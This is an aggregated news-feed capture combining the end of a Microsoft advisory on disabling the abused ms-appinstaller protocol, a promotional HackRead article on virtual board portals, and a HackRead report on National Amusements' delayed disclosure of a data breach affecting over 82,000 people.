We will continue to monitor future malicious activity and make ongoing improvements to prevent fraud, phishing, and a range of other persistent threats. Microsoft will remain vigilant as attackers continue evolving their techniques. Please refer to the Microsoft Threat Intelligence Blog: Financially motivated threat actors misusing App Installer for additional details and guidance.

**To address this issue**

1.  Microsoft has disabled the ms-appinstaller URI scheme handler by default in App Installer version 1.21.3421.0 or higher and if you have not specifically enabled the **EnableMSAppInstallerProtocol**, no further action is needed.
    
    *   Customers can check which version of App Installer is installed on their system by running the following PowerShell command: (Get-AppxPackage Microsoft.DesktopAppInstaller).Version
    *   For information on how to update your App Installer, see Install and update the App Installer.

**How to determine whether you may be at risk**

1.  The **EnableMSAppInstallerProtocol** group policy is set to “Not Configured” (blank) or “Enabled”
    
2.  The version of App Installer installed on your PC is between **v1.18.2691** and **v1.21.3421**
    
3.  Windows OS updates listed below between October 2022 and March 2023 contained a previous (vulnerable) version of the AppInstaller.
    
    *   March 21, 2023—KB5023773 (OS Builds 19042.2788, 19044.2788, and 19045.2788) Preview - Microsoft Support
        
    *   July 11, 2023—KB5028171 (OS Build 20348.1850) - Microsoft Support
        
    *   March 28, 2023—KB5023774 (OS Build 22000.1761) Preview - Microsoft Support
        
    *   October 25, 2022—KB5018496 (OS Build 22621.755) Preview - Microsoft Support
        
    *   Also, customers using builds **v1.22.3452-preview or lower** also contained vulnerable versions of AppInstaller.
        

Note: (not recommended) Customers that must use the ms-appinstaller protocol can still use the App Installer by setting the Group Policy **EnableMSAppInstallerProtocol** to **Disabled**. See Policy CSP – DesktopAppInstaller for additional information.

**References**

*   Installing Windows 10 apps from a web page - MSIX | Microsoft Learn
*   CVE Link
*   Financially motivated threat actors misusing App Installer

Microsoft addresses App Installer abuse

By Owais Sultan
Meetings without paper have become a reality thanks to advanced technologies. Digital tools help companies be more efficient…
This is a post from HackRead.com Read the original post: Why Virtual Board Portals are the Key to Better Collaboration and Decision-Making

Meetings without paper have become a reality thanks to advanced technologies. **Digital tools** help companies be more efficient while staying focused on their daily routine. Instead of traditional table books and paper documents, all the necessary board materials are stored and accessible via a secure digital platform, known as table management software. 

**What are paperless council meetings? **

A digital meeting refers to a business gathering conducted electronically, eliminating the need for traditional paper documents. In such meetings, organizers can instantly access, examine, and annotate meeting materials, agendas, and presentations on their electronic devices.

Embracing paperless council meetings contributes to sustainability by reducing paper waste and diminishing the energy consumption linked to printing, storing, and distributing physical documents. Additionally, the shift to **paperless board meetings** boosts the overall efficiency of meeting processes and cultivates enhanced communication among directors. 

****Why should you enhance Collaboration and Decision-Making with Virtual Board Portals?****

Here are the top 7 reasons to switch to paperless meeting software: 

****Save time for board members****

One of the greatest advantages of **smart board** software is that directors can use it to exchange relevant updates and documents and study them to prepare for a board meeting.

Then, once the event starts, they can go directly to conversation and decision-making. No endless updates, no boring reports. Only collaboration and fruitful discussions. 

The management of the board of directors is impossible without good budget management. As we’ve mentioned before, traditional meetings can be rather expensive. If you consider board software pricing, you will at least reduce the expenses related to printing all those paper copies that directors need to discuss.

If you decide to organize a virtual event, expenses will decrease considerably because you will not have to cover the travel of directors. Instead of paying for office space, accommodation, and travel, you will only have to support a paperless board meeting solution. 

****Improve the efficiency of board meetings****

The simple fact that the boards of directors do not need to go through updates at the beginning of the meeting already means that they will not be tired before they start discussing. Therefore, they can think clearly because they are not tired of listening to reports.

In addition, advice portals allow directors to create meeting agendas so that everyone can propose ideas before they take place. The paperless meeting solution provides members with different tools such as votes and polls that can improve the decision-making process. 

****Improve collaboration between board members and employees.****

Most consulting portal providers allow users to integrate this software with other business tools. According to the **knowa board portal overview**, this makes it easy to connect the consulting portal to the applications that employees use to synchronize the flow of undocumented documents and thus control the progress of tasks.

According to Nicholas Cooper – CEO of board-rooms.co.uk: “Moving to paperless meetings with this software creates a fluid and centralized workspace for managers, allowing them to stay in touch with employees even without office space”.

****Make access to information easy****

The paperless meeting management software can be accessed from any device and location, as long as a user has an Internet connection. This means that directors will not encounter delays or problems simply because they cannot receive a printed document. All the information downloaded from the digital board meeting portal is easy to access and members can study it even on the go.

****Protect company data****

**Data leaks are not a joke**. They are expensive and can to the company’s reputation once customers have realized that their sensitive data has been exposed. It is therefore crucial for a company to protect its information, and the board portal solution is perfect for this. This software allows you to hold paperless board meetings while keeping company documents reliably protected.

Criminals can’t access a board of directors portal because suppliers secure their servers and their customers’ repositories by **encryption**. For the benefit of board members and better protection, administrators can use additional security features such as two-factor authentication.

****Make your advice flexible****

Are the directors of your board located in different countries? Is anyone currently on a business trip? No problem, you can move on to paperless meetings by simply organizing the online event using videoconferencing software and a board portal.

Technology enables us to be flexible and focus less on office space. Take advantage of this opportunity to hold a virtual board meeting, even if some participants cannot physically attend.

****Conclusion****

Board meetings are electronic meetings of board directors, also known as paperless board meetings. During paperless meetings, directors can access, review, and annotate documents, agendas, and presentations in real-time using an Internet connection and their electronic devices.

Organizing paperless board meetings improves the efficiency of meetings and communication between leaders. It is one of the most efficient methods for Better Collaboration and Decision-Making.

****_RELATED ARTICLES_****

1.  **Maximizing Roi With The Best LMS For Elearning**
2.  **Technology and Software Redefine Business Operations**
3.  **Using GenAI in Your Business? Here Is What You Need To Know**
4.  **Learning Management System: What is it and Why do you need it?**
5.  **Top learning management system (LMS) software for small businesses**

Why Virtual Board Portals are the Key to Better Collaboration and Decision-Making

By Waqas
The company under criticism is National Amusements, the parent company of media giants such as Paramount and CBS.
This is a post from HackRead.com Read the original post: National Amusements Reveals Data Breach Amid Backlash Affecting 82,000+

Paramount and CBS’s parent company, National Amusements, took months to reveal the data breach that has impacted more than 82,000 people, including customers and potentially employees as well.

National Amusements, the parent company holding a controlling stake in entertainment giants Paramount, CBS, and numerous theatres across the United States, has come under scrutiny for delaying the disclosure of a major data breach that occurred late last year. The breach impacted 82,128 individuals, comprising both customers and potentially National Amusements employees.

The breach, which went unnoticed for months, was finally reported to the Maine Attorney General. According to the company’s statement, an “unauthorized individual” accessed the company network on December 13, 2022. However, National Amusements only became aware of the intrusion two days later.

Regarding the data affected in the breach, it includes information like name or other personal identifiers combined with financial account number or credit/debit card number (along with the security code, access code, password, or PIN for the account).

The data breach notification was submitted to the Maine Attorney General.

The company enlisted the services of a third-party firm to investigate the breach, a process that concluded “recently.” Curiously, the data breach was only officially acknowledged on August 23 of this year, possibly aligning with the completion of the external investigation.

Despite attempts from the media to seek clarification from National Amusements, the company has maintained near-radio silence, leaving questions about the delayed disclosure unanswered.

Currently, the company asserts that there have been no reports of stolen data being exploited by third parties or leaked online. Nevertheless, National Amusements has proactively taken measures to mitigate the aftermath, providing those affected with complimentary credit monitoring services through Experian for varying durations.

If you’re an employee of National Amusements or one of its customers, be cautious about phishing emails. Cybercriminals might impersonate the company to discuss the recent data breach, but their real intention could be to gather additional information, including your financial details. Stay vigilant and verify the legitimacy of any communication you receive related to the incident.

****_RELATED ARTICLES_****

1.  **OurMine hackers hack Marvel and Netflix Twitter accounts**
2.  **Best legal, free online streaming sites for movies, TV shows**
3.  **Hackers Leak First 8 Episodes of Steve Harvey’s “Funderdome”**
4.  **Soap2day Shuts Down Permanently – Free Legal, Paid Alternatives**
5.  **Potential 500GB Nickelodeon Leak: Unreleased Shows, Scripts at Risk**

Tag

#auth